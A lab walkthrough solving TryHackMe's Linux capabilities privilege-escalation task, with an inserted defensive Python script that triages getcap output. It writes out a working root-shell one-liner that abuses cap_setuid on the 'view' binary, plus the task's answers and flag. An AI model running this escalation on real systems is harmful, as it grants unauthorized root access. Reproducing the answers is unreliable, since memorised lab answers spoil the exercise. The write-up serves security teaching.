TryHackMe - Linux Privilege Escalation: Capabilities

This article discusses the solution for TryHackMe's Linux Privilege Escalation Capabilities task, so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation Capabilities Solution

Capabilities, which are used to grant specific privileges to processes or entities, can be used for privilege escalation. They are directly associated with processes or objects, allowing for finer-grained control over access.

How many binaries have set capabilities?

  1. Run the following command to list enabled capabilities:

getcap -r / 2>/dev/null

Answer: 6

What other binary can be used through its capabilities?

  1. Go to GTFOBins to check which binaries can be exploited via capabilities: https://gtfobins.github.io/#+capabilities

  2. Comparing GTFOBins against the list of enabled capabilities (see above), we can see that view can be used.

Answer: view
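
Seen from the defender's side, the same `getcap -r /` listing can be triaged automatically instead of being checked by eye. The script below is an added example, not part of the original write-up: it parses both getcap output styles and reports binaries holding a root-equivalent capability. The `HIGH_RISK` list and the sample paths are assumptions chosen for illustration.

```python
import re

# Capabilities that amount to root when attached to an editor, interpreter or shell.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}

# One clause of getcap's text form: "cap_setuid+ep", "cap_a,cap_b=eip", or "=ep" (all caps).
CLAUSE = re.compile(r"^((?:cap_[a-z0-9_]+|all)(?:,(?:cap_[a-z0-9_]+|all))*)?([=+-])([eip]*)$")

def parse_getcap_line(line):
    """Return (path, {capability: set of e/i/p flags}) or None if the line is not getcap output."""
    tokens = line.split()
    clauses = []
    while tokens and tokens[-1] != "=" and CLAUSE.match(tokens[-1]):
        clauses.insert(0, CLAUSE.match(tokens.pop()))
    if tokens and tokens[-1] == "=":      # older libcap prints "path = caps"
        tokens.pop()
    if not tokens or not clauses:
        return None
    caps = {}
    for m in clauses:                      # clauses apply left to right
        names, op, flags = m.group(1), m.group(2), set(m.group(3))
        for name in (names.split(",") if names else ["all"]):
            held = caps.get(name, set())
            caps[name] = flags if op == "=" else (held | flags if op == "+" else held - flags)
    return " ".join(tokens), caps

def risky_entries(getcap_output):
    """List (path, capability) pairs where a high-risk capability is in the permitted set."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for name, flags in sorted(caps.items()):
            # Permitted is enough: a process may raise a permitted capability to effective.
            if (name in HIGH_RISK or name == "all") and "p" in flags:
                findings.append((path, name))
    return findings

# Constructed sample in both output styles (not the lab machine's real output).
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/opt/tools/view = cap_setuid+ep
/opt/tools/my editor cap_setuid,cap_net_bind_service=ep
/usr/bin/inherit-only = cap_sys_admin+i
"""

if __name__ == "__main__":
    for path, cap in risky_entries(SAMPLE):
        print(f"REVIEW {path}: {cap}")
```

Feed it the real output of `getcap -r / 2>/dev/null`; a binary that should not hold the reported capability can have it cleared with `setcap -r <path>`.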

What is the content of the flag4.txt file?

  1. Execute the following commands, based on the GTFOBins entry. Don't forget to use py3, as py is not supported on the machine.

cp $(which view) .
./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

  2. Exit vim

  3. Run cat /home/ubuntu/flag4.txt

Answer: THM-9349843

Until next time. Keep learning.

Stay stoked and code. :)

